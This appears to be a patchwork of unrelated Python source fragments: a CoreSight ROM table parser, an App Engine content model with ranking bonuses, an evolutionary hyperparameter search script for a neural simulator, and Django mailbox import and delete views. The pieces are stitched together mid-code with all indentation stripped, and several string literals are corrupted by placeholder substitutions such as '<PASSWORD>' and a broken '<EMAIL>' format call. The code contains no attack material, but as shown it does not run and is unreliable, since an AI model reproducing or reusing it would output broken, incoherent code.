# Zero entry indicates the end of the table.
if present == self.ROM_TABLE_ENTRY_NOT_PRESENT_FINAL:
foundEnd = True
break
elif present == self.ROM_TABLE_ENTRY_PRESENT:
try:
self._handle_table_entry(entry, entryNumber)
except exceptions.TransferError as err:
LOG.error("Error attempting to probe CoreSight component referenced by "
"ROM table entry #%d: %s", entryNumber, err,
exc_info=self.session.get_current().log_tracebacks)
entryAddress += 4 * entrySizeMultiplier
entryNumber += 1
def _power_component(self, number, powerid, entry):
"""! @brief Enable power to a component defined by a ROM table entry."""
if not self._has_prr:
# Attempt GPR method of power domain enabling.
return super(Class9ROMTable, self)._power_component(number, powerid, entry)
# Check power request functionality version here so we can provide a nice warning message.
if not self.check_power_request_version():
LOG.warning("Class 0x9 ROM table #%d @ 0x%08x has unsupported version (%d) of power "
"request functionality, needed for entry #%d (entry=0x%08x). Skipping "
"component.", self.depth, self.address, self._pridr_version, number, entry)
return False
if not self.power_debug_domain(powerid):
LOG.error("Failed to power up power domain #%d", powerid)
return False
else:
LOG.info("Enabled power to power domain #%d", powerid)
return True
def _handle_table_entry(self, entry, number):
"""! @brief Parse one ROM table entry."""
# Get the component's top 4k address.
offset = entry & self.ROM_TABLE_ADDR_OFFSET_MASK[self._width]
if (entry & self.ROM_TABLE_ADDR_OFFSET_NEG_MASK[self._width]) != 0:
offset = ~bit_invert(offset, width=self._width)
address = self.address + offset
# Check power ID.
if (entry & self.ROM_TABLE_ENTRY_POWERIDVALID_MASK) != 0:
powerid = (entry & self.ROM_TABLE_ENTRY_POWERID_MASK) >> self.ROM_TABLE_ENTRY_POWERID_SHIFT
# Attempt to power up this component. Skip this component if we the attempt fails.
if not self._power_component(number, powerid, entry):
return
else:
powerid = None
# Create component instance.
cmpid = CoreSightComponentID(self, self.ap, address, powerid)
cmpid.read_id_registers()
# Is this component a power requestor?
if cmpid.factory == GPR.factory:
# Create the GPR instance and stash it.
self.gpr = cmpid.factory(self.ap, cmpid, None)
self.gpr.init()
LOG.info("%s[%d]%s", self.depth_indent, | |
k in self.reactions]
if version >= 29:
data['url'] = self.url
else:
data['audio_url'] = self.legacy_url
if version >= 32:
data['external_plays'] = self.external_plays
if version >= 33:
data['external_content_id'] = self.external_content_id
if version >= 35:
data['attachments'] = self.attachments
return data
def public(self, version=None, **kwargs):
return self.public_for_chunk_id(self.key.id(), version)
@property
def reactions(self):
self._upgrade_reactions()
return dict(zip(self.reaction_keys, self.reaction_types))
def set_reaction(self, account_key, reaction_type):
self._upgrade_reactions()
try:
index = self.reaction_keys.index(account_key)
if reaction_type is None:
del self.reaction_keys[index]
del self.reaction_types[index]
return
self.reaction_types[index] = reaction_type
except ValueError:
if reaction_type is None:
return
self.reaction_keys.append(account_key)
self.reaction_types.append(reaction_type)
@property
def text(self):
return ' '.join(s.text for s in self.text_segments)
@property
def url(self):
return files.storage_url(self.payload)
@property
def legacy_url(self):
return files.legacy_url(self.payload)
def _upgrade_reactions(self):
if len(self.reaction_keys) != len(self.reaction_types):
self.reaction_types = [u'👍'] * len(self.reaction_keys)
class ChunkInStream(Chunk):
# Points to the real chunk.
chunk_id = ndb.IntegerProperty()
@classmethod
def from_chunk(cls, chunk):
props = dict((p._code_name, p.__get__(chunk, Chunk))
for p in Chunk._properties.itervalues()
if type(p) is not ndb.ComputedProperty)
return cls(chunk_id=chunk.key.id(), **props)
def public(self, version=None, **kwargs):
return self.public_for_chunk_id(self.chunk_id, version)
class Config(ndb.Model):
value = ndb.JsonProperty()
class YouTubeIdProperty(ndb.StringProperty):
def _from_base_type(self, value):
# This is a patch to support migration from non-repeated values that were None.
if value is None:
logging.debug('Had to convert None to u\'\' in _from_base_type')
return u''
return super(YouTubeIdProperty, self)._from_base_type(value)
def _to_base_type(self, value):
if value is None:
logging.debug('Had to convert None to u\'\' in _to_base_type')
return u''
return super(YouTubeIdProperty, self)._to_base_type(value)
def _validate(self, value):
if value is None:
logging.debug('Had to ignore None in _validate')
return
return super(YouTubeIdProperty, self)._validate(value)
class Content(ndb.Model):
CDN_BASE_URL = 'https://d32au24mly9y2n.cloudfront.net'
UPLOAD_URL_ROOTS = [
'https://d32au24mly9y2n.cloudfront.net/hls/',
'https://d32au24mly9y2n.cloudfront.net/',
'https://s.reaction.cam/hls/',
'https://s.reaction.cam/',
'https://storage.googleapis.com/rcam/',
]
comment_count = ndb.IntegerProperty(default=0)
created = ndb.DateTimeProperty()
creator = ndb.KeyProperty(Account, required=True)
creator_twitter = ndb.StringProperty(indexed=False)
dedupe = ndb.StringProperty()
duration = ndb.IntegerProperty(default=0, indexed=False)
first_related_creator = ndb.KeyProperty(Account)
metadata = ndb.JsonProperty()
original_url = ndb.StringProperty()
properties = ndb.JsonProperty()
related_count = ndb.IntegerProperty(default=0)
related_to = ndb.KeyProperty(kind='Content')
request = ndb.KeyProperty(kind='ContentRequestPublic')
slug = ndb.StringProperty()
sort_bonus = ndb.IntegerProperty(default=0)
sort_bonus_penalty = ndb.IntegerProperty(default=0, indexed=False)
sort_index = ndb.IntegerProperty()
tags = ndb.StringProperty(repeated=True)
tags_history = ndb.StringProperty(indexed=False, repeated=True)
thumb_url_ = ndb.StringProperty('thumb_url', indexed=False)
title = ndb.StringProperty(indexed=False)
useragent = ndb.StringProperty(indexed=False)
video_url_ = ndb.StringProperty('video_url', indexed=False)
views = ndb.IntegerProperty(default=0)
views_real = ndb.IntegerProperty(default=0)
votes = ndb.IntegerProperty(default=0)
votes_real = ndb.IntegerProperty(default=0)
youtube_broken = ndb.BooleanProperty(default=False, indexed=False)
youtube_id_history = YouTubeIdProperty('youtube_id', repeated=True)
youtube_reaction_views = ndb.IntegerProperty()
youtube_reaction_views_updated = ndb.DateTimeProperty(indexed=False)
youtube_views = ndb.IntegerProperty()
youtube_views_updated = ndb.DateTimeProperty(indexed=False)
def add_comment_count(self, account, count=1):
if count < 0 and -count > self.comment_count:
count = -self.comment_count
self.comment_count += count
if account.key != self.creator:
if account.quality >= 4:
bonus = 2000
elif account.quality == 3:
bonus = 1500
elif account.quality == 2:
bonus = 750 + min(account.follower_count * 5, 250)
elif account.quality == 1:
bonus = 250 + min(account.follower_count * 5, 500)
else:
bonus = 100
self.add_sort_index_bonus(bonus * count)
def add_related_count(self, account, count=1, account_reacted_already=False):
# Note: Returns True if this resulted in first_related_creator being set.
first = False
if count < 0 and -count > self.related_count:
count = -self.related_count
self.related_count += count
if self.related_count > 0:
self.add_tag('is reacted', allow_restricted=True)
if account.key == self.creator:
return False
if account.key == self.first_related_creator:
account_reacted_already = True
if count > 0 and not self.first_related_creator:
if self.related_count < 3:
# Bump the content sort index as if it was just created.
i = self.get_sort_index() + self.sort_bonus - self.sort_bonus_penalty
self.sort_index = max(i, self.sort_index)
self.first_related_creator = account.key
first = True
if account.quality > 1:
bonus = 13000 + account.quality * (1000 + min(account.follower_count * 100, 2000))
elif account.quality == 1:
bonus = 2500 + min(account.follower_count * 200, 5000)
else:
bonus = 500
if account_reacted_already:
# Don't let one user make content trend.
bonus //= 100
self.add_sort_index_bonus(bonus * count)
if 'is hot' in self.tags and self.related_count >= (6 if self.related_to else 3):
# Allow reactions to become originals with enough reactions.
self.add_tag('original', allow_restricted=True)
return first
def add_sort_index_bonus(self, bonus):
if bonus < 0 and -bonus > self.sort_bonus:
bonus = -self.sort_bonus
age = (datetime.utcnow() - self.created).total_seconds()
val = float(age + self.sort_bonus) ** 2 / 186624000000
bonus_w_penalty = int(bonus * min(max(1 - val, 0.1), 1))
self.sort_bonus += bonus
self.sort_bonus_penalty += bonus - bonus_w_penalty
self.sort_index += bonus_w_penalty
if self.sort_bonus > 50000:
self.add_tag('is hot', allow_restricted=True)
def add_tag(self, tag, **kwargs):
self.add_tags([tag], **kwargs)
def add_tags(self, tags, allow_restricted=False, **kwargs):
if isinstance(tags, basestring):
tags = self.parse_tags(tags, allow_restricted=allow_restricted)
else:
tags = set(tt for t in tags for tt in self.parse_tags(t, allow_restricted=allow_restricted))
self.set_tags(set(self.tags) | tags, allow_restricted=allow_restricted, **kwargs)
def add_view_count(self, account, is_bot=False, count=1):
# Note: `account` may be None since anonymous users can watch videos.
if not account or account.key != self.creator:
if is_bot:
bonus = 1
else:
bonus = 5
self.add_sort_index_bonus(bonus * count)
self.views += count
if not is_bot:
self.views_real += count
def add_vote_count(self, account, is_bot=False, count=1):
if account.key != self.creator:
if account.quality >= 4:
bonus = 5000
elif account.quality == 3:
bonus = 4000
elif account.quality == 2:
bonus = 2000 + min(account.follower_count * 5, 1000)
elif account.quality == 1:
bonus = 1000 + min(account.follower_count * 5, 1000)
else:
bonus = 500
if is_bot:
bonus //= 10
self.add_sort_index_bonus(bonus * count)
self.votes += count
if self.views < self.votes:
self.views = self.votes
if not is_bot:
self.votes_real += count
def became_public(self, creator, related_to=None, first_time=False):
# Public tags logic.
if creator.publish:
# Add the published tag for whitelisted accounts.
self.add_tag('published', allow_restricted=True)
# Initial content bonus.
if creator.quality >= 4:
self.add_sort_index_bonus(16000)
elif creator.quality == 3:
self.add_sort_index_bonus(15000)
elif creator.quality == 2:
self.add_sort_index_bonus(10000)
elif creator.quality == 1:
self.add_sort_index_bonus(1000)
# Remaining logic is only for reactions.
if not related_to:
return
# Transfer tags from original to content.
for tag in related_to.tags:
if ' ' in tag or tag in config.NON_TRANSFERABLE_TAGS:
continue
self.add_tag(tag)
@classmethod
def clean_title(cls, title):
suffixes = [u' - YouTube']
for s in suffixes:
if not title.endswith(s):
continue
title = title[:-len(s)]
return title.strip()
@classmethod
def decorate(cls, content_list, include_creator=False, include_related=False, for_account_key=None):
keys = []
if include_creator:
keys.extend({c.creator for c in content_list})
if include_related:
keys.extend({c.related_to for c in content_list if c.related_to})
if for_account_key:
# Also look up votes for every piece of content.
keys.extend(ndb.Key('ContentVote', c.key.id(), parent=for_account_key)
for c in content_list)
if not keys:
return {}, [None] * len(content_list)
entities = ndb.get_multi(keys)
if for_account_key:
# Remove vote data from the lookup.
votes = entities[-len(content_list):]
entities = entities[:-len(content_list)]
else:
votes = [None] * len(content_list)
lookup = {e.key: e for e in entities if e}
return lookup, votes
def decoration_info(self, include_creator=False, include_related=False, for_account_key=None):
keys = []
if include_creator:
keys.append(self.creator)
if include_related and self.related_to:
keys.append(self.related_to)
if for_account_key:
keys.append(ndb.Key('ContentVote', self.key.id(), parent=for_account_key))
if not keys:
return (None, None, None)
entities = ndb.get_multi(keys)
return (
entities[0] if include_creator else None,
entities[1 if include_creator else 0] if include_related and self.related_to else None,
entities[-1] is not None if for_account_key else False)
@classmethod
def get_by_youtube_id_async(cls, youtube_id):
return cls.query(cls.youtube_id_history == youtube_id).get_async()
@classmethod
def get_sort_index(cls):
delta = datetime.utcnow() - datetime(2017, 5, 1)
return int(delta.total_seconds())
@property
def has_been_public(self):
return any(not self.is_tag_unlisted(t) for t in self.tags_history)
@property
def is_public(self):
return any(not self.is_tag_unlisted(t) for t in self.tags)
@classmethod
def is_tag_restricted(cls, tag):
tag = cls.parse_tag(tag, allow_restricted=True)
if not tag:
return False
return ' ' in tag or tag in config.RESTRICTED_TAGS
@classmethod
def is_tag_unlisted(cls, tag):
tag = cls.parse_tag(tag, allow_restricted=True)
if not tag:
return False
return ' ' in tag or tag in config.UNLISTED_TAGS
@classmethod
def make_slug(cls, value):
if not isinstance(value, basestring):
raise TypeError('Expected string')
value = re.sub(r'[^a-z0-9]+', ' ', value.lower())
value = re.sub(r'\s+', '-', value.strip())
if len(value) > 50:
value = value[:46]
if not value.endswith('-'):
value += '-'
value += random.base62(3)
return value
@classmethod
def new(cls, allow_restricted_tags=False, tags=[], **kwargs):
if 'created' not in kwargs:
kwargs['created'] = datetime.utcnow()
if 'sort_index' not in kwargs:
kwargs['sort_index'] = cls.get_sort_index()
content = cls()
for name, value in kwargs.iteritems():
setattr(content, name, value)
content.set_tags(tags, allow_restricted=allow_restricted_tags)
if 'slug' not in kwargs and content.is_public:
# Auto-set slug if content is public.
content.slug = content.slug_from_video_url()
return content
@classmethod
def parse_tag(cls, tag_string, allow_restricted=False):
tags = cls.parse_tags(tag_string, allow_restricted=allow_restricted)
if len(tags) != 1:
return None
return iter(tags).next()
@classmethod
def parse_tags(cls, tags_string, allow_restricted=False, separator=','):
tag_strings = [t.strip(' #').lower() for t in tags_string.split(separator)]
return {t for t in tag_strings if t and (allow_restricted or not cls.is_tag_restricted(t))}
def public(self, version=None, **kwargs):
data = {
'id': self.key.id(),
'created': self.created,
'duration': self.duration,
'original_url': self.original_url,
'tags': self.visible_tags,
'thumb_url': self.thumb_url,
'title': | |
<reponame>alexeyche/dnn_old
#!/usr/bin/env python
import numpy as np
import sys
import argparse
import logging
import os
import json
from os.path import join as pj
from StringIO import StringIO as sstream
import subprocess as sub
import uuid
import time
from collections import OrderedDict
import multiprocessing
import pickle
import random
import shutil
import re
import lib.cma as cma
import lib.env as env
from lib.util import read_json
from lib.util import make_dir
from lib.util import parse_attrs
from lib.util import add_coloring_to_emit_ansi
from lib.evolve_state import State
from run_sim import DnnSim
logFormatter = logging.Formatter("%(asctime)s [%(levelname)s] %(message)-100s")
rootLogger = logging.getLogger()
rootLogger.setLevel(logging.DEBUG)
consoleHandler = logging.StreamHandler(sys.stderr)
consoleHandler.emit = add_coloring_to_emit_ansi(consoleHandler.emit)
consoleHandler.setFormatter(logFormatter)
rootLogger.addHandler(consoleHandler)
class GlobalConfig(object):
Epochs = 1
AddOptions = []
Jobs = 8
BadValue = 1.0
SimJobs = 1
ConstFilename = DnnSim.CONST_JSON
VarSpecsFile = pj(os.path.realpath(os.path.dirname(__file__)), "var_specs.json")
Mock = False
NumberOfCalcutationsUpperBound = 50000
RUN_SIM_PY = pj(os.path.realpath(os.path.dirname(__file__)), "run_sim.py")
class Distribution(object):
@staticmethod
def parse_distribution(s, val=None):
if isinstance(s, basestring):
m = re.match("Exp\((.*?)\)", s)
if m:
return ExpDistribution(float(m.group(1)) if val is None else val)
return None
class ExpDistribution(object):
def __init__(self, r):
self.rate = r
def __getitem__(self, idx):
assert(idx == 0)
return self.rate
def __str__(self):
return "Exp({})".format(self.rate)
def __repr__(self):
return str(self)
def scale_to(x, min, max, a, b):
return ((b-a)*(x - min)/(max-min)) + a
def proc_element(d, p):
if isinstance(d, dict):
if d.get(p) is None:
raise Exception("Can't find key {} in constants".format(p))
return d
elif isinstance(d, list):
if len(d)<=p:
raise Exception("Can't find key {} in constants".format(p))
return d
elif isinstance(d, basestring):
return Distribution.parse_distribution(d)
else:
raise Exception("Got strange type in constants: {}".format(type(d)))
def set_value_in_path(d, path, v):
p = path[0]
d = proc_element(d, p)
if isinstance(d[p], dict) or isinstance(d[p], list):
return set_value_in_path(d[p], path[1:], v)
else:
distr = Distribution.parse_distribution(d[p], v)
if distr:
d[p] = str(distr)
else:
d[p] = v
def get_value_in_path(d, path):
p = path[0]
d = proc_element(d, p)
if isinstance(d[p], dict) or isinstance(d[p], list) or Distribution.parse_distribution(d[p]):
return get_value_in_path(d[p], path[1:])
else:
return d[p]
def propagate_deps(const):
weights = [ v["start_weight"] for it in const["sim_configuration"]["conn_map"].values() for v in it ]
mean_start_weight = sum(weights)/len(weights)
const["globals"]["max_weight"] = 5 * mean_start_weight
const["globals"]["mean_weight"] = mean_start_weight
def proc_vars(const, var_specs, vars, min=0.0, max=1.0):
for k, v in vars.iteritems():
if k not in var_specs:
raise Exception("Can't find specs for variable {}".format(k))
path, (a, b) = var_specs[k]
new_v = scale_to(v, min, max, a, b)
set_value_in_path(const, path, new_v)
propagate_deps(const)
return json.dumps(const, indent=2)
def get_vars(const, var_specs, vars, min=0.0, max=1.0):
var_values = []
for k in vars:
if k not in var_specs:
raise Exception("Can't find specs for variable {}".format(k))
path, (a, b) = var_specs[k]
v = get_value_in_path(const, path)
scaled_v = scale_to(v, a, b, min, max)
var_values.append(scaled_v)
return dict(zip(vars, var_values))
def communicate(p):
stdout, stderr = p.communicate()
if p.returncode != 0:
logging.error("process failed:")
if stdout:
logging.error("\n\t"+stdout)
if stderr:
logging.error("\n\t"+stderr)
return GlobalConfig.BadValue
return float(stdout.strip())
def runner(x, vars, working_dir, wait=False, id=None, min=0.0, max=1.0):
if id is None:
id = uuid.uuid1()
working_dir = pj(working_dir, str(id))
if os.path.exists(working_dir):
raise Exception("Working dir is already exists {}!".format(working_dir))
make_dir(working_dir)
const_json = pj(working_dir, os.path.basename(GlobalConfig.ConstFilename))
specs = read_json(GlobalConfig.VarSpecsFile)
with open(const_json, "w") as fptr:
fptr.write(
proc_vars(
const = read_json(GlobalConfig.ConstFilename)
, var_specs = specs
, vars = dict(zip(vars, x))
, min = min
, max = max
)
)
cmd = [
RUN_SIM_PY
, "--working-dir", working_dir
, "--epochs", str(GlobalConfig.Epochs)
, "--const", const_json
, "--slave"
, "--jobs", str(GlobalConfig.SimJobs)
] + GlobalConfig.AddOptions
for v in vars:
path, range = specs[v]
if "prepare_data" in path:
cmd += ["--prepare-data"]
break
logging.info(" ".join(cmd))
if GlobalConfig.Mock:
p = sub.Popen("sleep 1.0 && echo 1.0", shell=True, stdout=sub.PIPE, stderr=sub.PIPE)
if wait:
return communicate(p)
return p
p = sub.Popen(cmd, stdout=sub.PIPE, stderr=sub.PIPE)
if wait:
return communicate(p)
return p
def lhs_sample(n, rng):
return (np.asarray(random.sample(range(1,n+1), n)) - rng.random_sample(n))/float(n)
class Algo(object):
def create_workdir(self, wd):
state = None
if os.path.exists(wd):
while True:
ans = raw_input("%s already exists. Continue learning? (y/n): " % (wd))
if ans in ["Y","y"]:
state = State.read_from_dir(wd)
break
elif ans in ["N", "n"]:
logging.warning("Deleting {}".format(wd))
shutil.rmtree(wd)
make_dir(wd)
break
else:
logging.warning("incomprehensible answer")
else:
make_dir(wd)
return wd, state
@staticmethod
def wait_pool(pool, ans_list):
while True:
for pi, (id, p) in enumerate(pool):
if not p.poll() is None:
ans_list.append( (id, communicate(p)) )
del pool[pi]
return
time.sleep(0.5)
@staticmethod
def dump_state(wd, state, asks, tells, pool):
asks_d = dict(asks)
X = list()
tells_current = list()
finished_ids = dict()
for finished_id, tell in [ (finished_id, tell) for finished_id, tell in sorted(tells, key=lambda x: x[0]) ]:
X.append(asks_d[finished_id])
del asks_d[finished_id]
tells_current.append(tell)
finished_ids[finished_id] = True
state.add_val(X, tells_current)
state.dump(wd)
pool = [ (idp, p) for idp, p in pool if idp not in finished_ids ]
tells = [ (idp, t) for idp, t in tells if idp not in finished_ids ]
return state, asks_d.items(), tells, pool
class MonteCarlo(Algo):
def __init__(self, attrs):
self.number = int(attrs.get("number", 1000))
self.seed = attrs.get("seed", random.randint(0, 65535))
self.max_bound = attrs.get("max_bound", 1)
self.min_bound = attrs.get("min_bound", 0)
def __call__(self, vars, tag=None):
wd, state = self.create_workdir(
pj(
env.runs_dir
, "mc" if tag is None else tag
)
)
if state is None:
state = State(self.seed)
state.dump(wd)
rng = np.random.RandomState(state.seed)
asks, tells, pool = [], [], []
run_ids = range(sum([ len(v[1]) for v in state.vals ]), self.number)
dim_size = len(vars)
X = np.zeros((len(run_ids), dim_size))
for dim_idx in xrange(dim_size):
X[:,dim_idx] = self.min_bound + self.max_bound*lhs_sample(len(run_ids), rng)
for x_id, run_id in enumerate(run_ids):
x = X[x_id, :]
pool.append( (run_id, runner(x, vars, wd, wait=False, id=run_id, min=self.min_bound, max=self.max_bound)) )
asks.append( (run_id, x) )
if len(pool)>=GlobalConfig.Jobs:
Algo.wait_pool(pool, tells)
state, asks, tells, pool = Algo.dump_state(wd, state, asks, tells, pool)
while len(pool)>0:
Algo.wait_pool(pool, tells)
state, asks, tells, pool = Algo.dump_state(wd, state, asks, tells, pool)
class CmaEs(Algo):
def __init__(self, attrs):
self.max_bound = attrs.get("max_bound", 10)
self.min_bound = attrs.get("min_bound", 0)
self.popsize = attrs.get("popsize", 15)
self.sigma = attrs.get("sigma", 2)
self.seed = attrs.get("seed", random.randint(0, 65535))
def __call__(self, vars, tag=None):
wd, state = self.create_workdir(
pj(
env.runs_dir
, "cma_es" if tag is None else tag
)
)
if state is None:
state = State(self.seed)
state.dump(wd)
#start_vals = get_vars(
# const = read_json(GlobalConfig.ConstFilename)
# , var_specs = read_json(GlobalConfig.VarSpecsFile)
# , vars = vars
# , min = self.min_bound
# , max = self.max_bound
#)
rng = np.random.RandomState(state.seed)
start_vals = self.min_bound + self.max_bound*rng.random_sample(len(vars))
es = cma.CMAEvolutionStrategy(
start_vals
, self.sigma
, {
'bounds' : [
self.min_bound
, self.max_bound
],
'popsize' : self.popsize
, 'seed' : state.seed
}
)
for X, tells in state.vals:
X = es.ask()
es.tell(X, tells)
id = sum([ len(v[1]) for v in state.vals ])
while not es.stop():
X = es.ask()
asks, tells, pool = [], [], []
tells, pool = [], []
for Xi in X:
p = runner(Xi, vars, wd, wait=False, id=id, min=self.min_bound, max=self.max_bound)
pool.append( (id, p) )
id+=1
if len(pool)>=GlobalConfig.Jobs:
Algo.wait_pool(pool, tells)
state, asks, tells, pool = Algo.dump_state(wd, state, asks, tells, pool)
while len(pool)>0:
self.wait_pool(pool, tells)
state, asks, tells, pool = Algo.dump_state(wd, state, asks, tells, pool)
tells = [ out for _, out in sorted(tells, key=lambda x: x[0]) ]
es.tell(X, tells)
es.disp()
class GridSearch(Algo):
def __init__(self, attrs):
self.max_bound = attrs.get("max_bound", 1)
self.min_bound = attrs.get("min_bound", 0)
self.step = float(attrs.get("step", 0.1))
self.freeze_point = attrs.get("freeze_point", None)
self.non_freeze_vars = attrs.get("non_freeze_vars", None)
def __call__(self, vars, tag=None):
wd, state = self.create_workdir(
pj(
env.runs_dir
, "grid_search" if tag is None else tag
)
)
if state is None:
state = State(0) # doesn't matter
state.dump(wd)
if self.freeze_point:
self.freeze_point = [ float(p) for p in self.freeze_point.split(" ") if p.strip() ]
if self.non_freeze_vars is None:
raise Exception("Got freeze point but freeze variables are not defined")
if self.non_freeze_vars:
self.non_freeze_vars = [ v.strip() for v in self.non_freeze_vars.split(" ") if v.strip() ]
else:
self.non_freeze_vars = vars
dim_of_problem = len(self.non_freeze_vars)
number_of_dim_slice = (self.max_bound - self.min_bound)/self.step
axis_slices = [ np.linspace(self.min_bound, self.max_bound, num=number_of_dim_slice) for _ in xrange(dim_of_problem) ]
if len(axis_slices) == 1:
points = axis_slices[0].reshape(1, -1).T
else:
points = np.vstack(np.meshgrid(*axis_slices)).reshape(dim_of_problem, -1).T
number_of_steps = len(points)
if number_of_steps > GlobalConfig.NumberOfCalcutationsUpperBound:
raise Exception("There are a lot of calculations ({}). Reconsider your setup".format(number_of_steps))
nsteps_done = sum([ len(v[1]) for v in state.vals ])
points = points[nsteps_done:]
asks, tells, pool = [], [], []
for id, point in enumerate(points):
if self.freeze_point:
x = list(self.freeze_point)
for vi, v in enumerate(self.non_freeze_vars):
try:
var_idx = vars.index(v)
except ValueError:
raise Exception("Can't find non freeze var {} in specification".format(v))
x[var_idx] = point[vi]
else:
x = point
pool.append( (id, runner(x, vars, wd, wait=False, id=id, min=self.min_bound, max=self.max_bound)) )
asks.append( (id, x) )
if len(pool)>=GlobalConfig.Jobs:
Algo.wait_pool(pool, tells)
state, asks, tells, pool = Algo.dump_state(wd, state, asks, tells, pool)
| |
'xlsx'):
import xlrd
content = fobj.read()
workbook = xlrd.open_workbook(filename=None, file_contents=content)
table = workbook.sheets()[0]
for line in xrange(table.nrows):
#前x行跳过
if line in (0,):
continue
lines.append( table.row_values(line) )
idx = 0
if len(lines)>500:
messages.add_message(request, messages.ERROR, _(u"单次只能导入500行数据,请分批次导入。"))
return render(request, template_name=template_name, context={
'domain': domain,
'failures': failures,
'success': success
})
for elem in lines:
# 用户名 真实名称 所属部门 职位 工号 手机号码 电话号码 密码 邮箱容量 网盘容量 排序权重 QQ号码 出生日期 密码
fields_list = ['name', 'realname', 'dept', 'position', 'eenumber', 'tel_mobile', 'tel_work',
'quota_mailbox', 'quota_netdisk', 'showorder', 'im_qq', 'birthday', '<PASSWORD>']
data = {}
for i, k in enumerate(fields_list):
try:
v = elem[i]
if isinstance(v, str) or isinstance(v, unicode):
v = v.strip()
else:
v = v
#excel保存日期为数字的
if fext in ('xls', 'xlsx') and k == "birthday" and v:
excel_date = int(v)
dt = datetime.datetime.fromordinal(datetime.datetime(1900, 1, 1).toordinal() + excel_date - 2)
v = dt.strftime('%Y-%m-%d')
if k == "im_qq" and v:
v = int(float(v))
data[k] = v
except Exception,err:
print "err: ",err
data[k] = ''
# 检测用户名是否存在
name = data.get('name', '')
try:
mailbox_obj = Mailbox.objects.get(name=name, domain=domain)
except:
failures.append([_(u'用户不存在'), line])
continue
try:
mailboxuser_obj = MailboxUser.objects.get(mailbox_id=mailbox_obj.id)
except:
failures.append([_(u'用户帐号不存在'), line])
continue
mailbox_size_using = mailbox_obj.quota_mailbox
netdisk_size_using = mailbox_obj.quota_netdisk
quota_mailbox = data.get('quota_mailbox', '')
quota_netdisk = data.get('quota_netdisk', '')
try:
quota_mailbox = int(quota_mailbox)
except:
quota_mailbox = mailbox_obj.quota_mailbox
try:
quota_netdisk = int(quota_netdisk)
except:
quota_netdisk = mailbox_obj.quota_netdisk
data["quota_mailbox"] = quota_mailbox
data["quota_netdisk"] = quota_netdisk
mailbox_data = mailbox_obj.__dict__
mailbox_data.update(data)
_v = mailbox_data.get('pwd_days_time', '')
if isinstance(_v, six.integer_types):
mailbox_data['pwd_days_time'] = int(time.time())
mailboxuser_data = mailboxuser_obj.__dict__
mailboxuser_data.update(data)
form = MailboxForm(domain, mailbox_data, instance=mailbox_obj)
#导入的不判断密码
form.is_check_passwd = False
user_form = MailboxUserForm(domain, mailboxuser_data, instance=mailboxuser_obj)
if form.is_valid() and user_form.is_valid():
mailbox_size = form.cleaned_data.get('quota_mailbox')
netdisk_size = form.cleaned_data.get('quota_netdisk')
try:
checker.simple_check(domain_id, mailbox_size, netdisk_size, mailbox_size_using=mailbox_size_using,
netdisk_size_using=netdisk_size_using, count=0)
except Exception, e:
failures.append([e.message, elem])
else:
obj = form.save()
user_form.save(obj.id)
# 部门处理
dept = data.get('dept', '')
if dept:
parent_id = -1
for d in dept.split('-'):
dept_obj, __ = Department.objects.get_or_create(domain=domain, parent_id=parent_id, title=d)
parent_id = dept_obj.id
if parent_id > 0:
DepartmentMember.objects.filter(domain=domain, mailbox_id=mailbox_obj.id).delete()
DepartmentMember.objects.create(
domain_id=domain.id,
mailbox_id=mailbox_obj.id,
dept_id=parent_id,
position=u"",
)
position = data.get('position', '')
if position:
DepartmentMember.objects.filter(domain=domain, mailbox_id=mailbox_obj.id).update(position=position)
success += 1
else:
failures.append([u'{}{}'.format(form.errors, user_form.errors), elem])
idx += 1
return render(request, template_name=template_name, context={
'domain': domain,
'failures': failures,
'success': success
})
@licence_required
def delete_account(request, template_name='mailbox/delete_account.html'):
domain_id = get_domainid_bysession(request)
domain = Domain.objects.get(id=domain_id)
if request.method == 'POST':
mailboxs = request.POST.get('mailboxs', '')
mailbox_list = []
for m in mailboxs.split('\n'):
m = m.strip()
if not m:
continue
if m.find('@') == -1:
m = '{}<EMAIL>(m, domain.domain)
mailbox_list.append(m)
mailboxs = Mailbox.objects.filter(username__in=mailbox_list)
if mailboxs.filter(name__in=LICENCE_EXCLUDE_LIST).count()>0:
messages.add_message(request, messages.ERROR, _(u'禁止删除特殊管理帐号system'))
elif not request.user.is_superuser and mailboxs.filter(is_superuser=True).count()>0:
messages.add_message(request, messages.ERROR, _(u'当前帐号没有删除超级管理员的权限'))
else:
ids = list(mailboxs.values_list('id', flat=True))
ids = ','.join([str(id) for id in ids])
mailboxs.update(disabled='1')
task_queue = TaskQueue()
task_queue.add_task_to_queue('delete', {'type': 'mailbox', 'target_ids': ids})
ProxyRedisLog.objects.create(data=json.dumps({"protocol": "core_mailbox", "data": {"del": ids}}),
exec_type='delete', protocol='core_mailbox', save_status=1)
messages.add_message(request, messages.SUCCESS, '{}{}'.format(_(u'已成功删除邮箱:'), ', '.join(mailbox_list)))
return render(request, template_name=template_name, context={
'domain': domain
})
@licence_required
def backup_account(request, template_name='mailbox/backup_account.html'):
domain_id = get_domainid_bysession(request)
domain = Domain.objects.get(id=domain_id)
backup = request.GET.get('bakcup', '')
if backup:
pass
return render(request, template_name=template_name, context={
'domain': domain
})
@licence_required
def edit_account(request, id, template_name='mailbox/edit_account.html'):
domain_id = get_domainid_bysession(request)
domain = Domain.objects.get(id=domain_id)
obj = Mailbox.objects.get(id=id)
user = obj.mailboxuser
form = MailboxForm(domain, instance=obj)
user_form = MailboxUserForm(domain, instance=user)
groups = CoreGroup.objects.filter(domain_id=domain_id)
group_members = CoreGroupMember.objects.filter(mailbox=obj)
depts = DepartmentMember.objects.filter(mailbox_id=obj.id)
maillists = ExtList.objects.filter(listtype='general', domain_id=domain_id)
maillist_member = ExtListMember.objects.filter(address=obj.username)
relate_email = WmRelateEmail.objects.filter(mailbox_id=obj.id)
domains = Domain.objects.all()
return render(request, template_name=template_name, context={
'obj': obj,
'form': form,
'user_form': user_form,
'user': user,
'groups': groups,
'group_members': group_members,
"dept_list": json.dumps(get_dept_list_sort(get_user_child_departments_kv(request, domain_id))),
'depts': depts,
'maillists': maillists,
'maillist_member': maillist_member,
'relate_email': relate_email,
'domains': domains,
"mailbox_id": obj.id,
})
@licence_required
def mailbox_limit_whitelist(request):
def getPostMailbox(key):
#从 entry_{{ mailbox }}_id 这种格式中把 mailbox 提取出来
l = key.split("_")
l.pop(0)
flag = l.pop(-1)
mailbox = "_".join(l)
return mailbox
def setPostMailboxData(mailbox, key, value):
mailboxDict.setdefault(mailbox, {})
mailboxDict[mailbox][key] = value
def saveNewEmail(mailbox):
if mailbox in mailboxDict:
return
